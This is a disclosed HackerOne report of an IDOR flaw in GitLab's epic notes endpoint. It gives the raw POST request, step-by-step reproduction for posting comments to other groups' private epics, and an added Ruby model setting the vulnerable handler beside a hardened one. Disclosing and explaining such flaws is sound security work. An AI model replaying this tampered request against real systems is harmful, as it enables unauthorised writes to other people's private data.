Add comments/Discussion on Epic of any Public/Private group on GitLab (IDOR)
HackerOne report #434197 by vijay_kumar1110 on 2018-11-05:
Description: In any public/private group with the Gold plan you can access Epics. In an Epic you have the option of commenting and creating a discussion. With every new Epic an Epic_ID is generated. The add comment/discussion on Epic request is vulnerable to an IDOR attack, where changing the Epic_ID lets you add comments/discussions to the Epic of any public or private group.
## Vulnerable Request:
POST /groups/[Group_name]/-/epics/1/notes HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/groups/vijaykumar007Publicgroup/-/epics/1
X-CSRF-Token:
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 117
Connection: close
Cookie: [Cookies]
note%5Bnoteable_type%5D=epic&note%5Bnoteable_id%5D=[Epic_ID]&note%5Bnote%5D=movddvmo&merge_request_diff_head_sha=undefined
Vulnerable parameter: noteable_id (the Epic_ID)
Steps To Reproduce:
- From the test1 user account, create a new private group (the victim group).
- Start the Gold free trial and the Epic feature will be enabled.
- Create a new Epic (e.g. victim_epic, ID=1234).
- Now log in from the test2 user account and try to access the victim group.
- You will not have access to this group.
- Now create a new group from the test2 account and enable the Gold trial.
- Now create a new Epic and, in that Epic, create a new discussion.
- Intercept this request; it will look something like the request shown above.
- Now change the Epic_ID in the POST parameter and send the request.
- You will notice the discussion has been added to the victim Epic. The same can be done with public groups too.
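The flaw described in the request above and walked through in the steps, as an added example that is not the report's or GitLab's own code: an in-memory model in Ruby (GitLab's own language) of the epic note endpoint, with the vulnerable handler that trusts note[noteable_id] from the POST body next to a hardened one that only accepts an epic belonging to the group named in the URL path and first checks that the caller may read that group. The group names, user names, epic ids, the can_read? rule and the stores are all constructed for the illustration; GitLab's real permission model is more detailed than this.

```ruby
# Added example, not GitLab code. Models an IDOR on the epic notes endpoint:
# the epic to comment on is taken from the POST body (note[noteable_id]) and
# looked up globally, so any existing epic id is accepted regardless of the
# group in the URL. All groups, users and epics below are constructed.

Group = Struct.new(:name, :private, :members)
Epic  = Struct.new(:id, :group)
Note  = Struct.new(:epic_id, :author, :body)

class NotAuthorized < StandardError; end

# Constructed global epic store keyed by the epic's database id
EPICS = {}

# Seed two private groups, each owned by a different user, with one epic each.
def seed
  victim   = Group.new("victim-group", true, ["test1"])
  attacker = Group.new("attacker-group", true, ["test2"])
  EPICS.clear
  EPICS[1234] = Epic.new(1234, victim)   # the victim's epic (ID=1234)
  EPICS[1]    = Epic.new(1, attacker)    # the attacker's own epic
  { victim: victim, attacker: attacker }
end

# Simplified read rule: public groups are readable by anyone, private ones
# only by members (assumption for this example).
def can_read?(user, group)
  !group.private || group.members.include?(user)
end

# Vulnerable handler: the group from the URL path is ignored and the epic is
# fetched by the body-supplied id alone, so a note lands on any epic that exists.
def create_note_vulnerable(user, _url_group, params)
  epic = EPICS.fetch(params["noteable_id"])
  Note.new(epic.id, user, params["note"])
end

# Hardened handler: authorize against the group in the URL, then accept the
# body-supplied epic only if it actually belongs to that group.
def create_note_hardened(user, url_group, params)
  raise NotAuthorized unless can_read?(user, url_group)
  epic = EPICS[params["noteable_id"]]
  raise NotAuthorized if epic.nil? || epic.group != url_group
  Note.new(epic.id, user, params["note"])
end

# Replays the report: test2 posts to their own group's notes URL but swaps
# noteable_id for the victim's epic id.
def demo
  groups = seed
  params = { "noteable_id" => 1234, "note" => "movddvmo" }
  vuln = create_note_vulnerable("test2", groups[:attacker], params)
  hardened = begin
    create_note_hardened("test2", groups[:attacker], params)
  rescue NotAuthorized
    :rejected
  end
  { vulnerable: vuln.epic_id, hardened: hardened }
end

if __FILE__ == $PROGRAM_NAME
  p demo  # vulnerable handler writes to epic 1234, hardened one rejects
end
```

The hardened version keys authorization off the resource that is already authorized in the URL (the group) and treats the body id as a selector within that scope rather than as a trusted reference; the same pattern applies to any nested resource whose parent is named in the path.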
Supporting Material/References:
Let me know if you require any.
Impact
Add comments/Discussion on Epic of any Public/Private group on GitLab (IDOR)
Edited by Dennis Appelt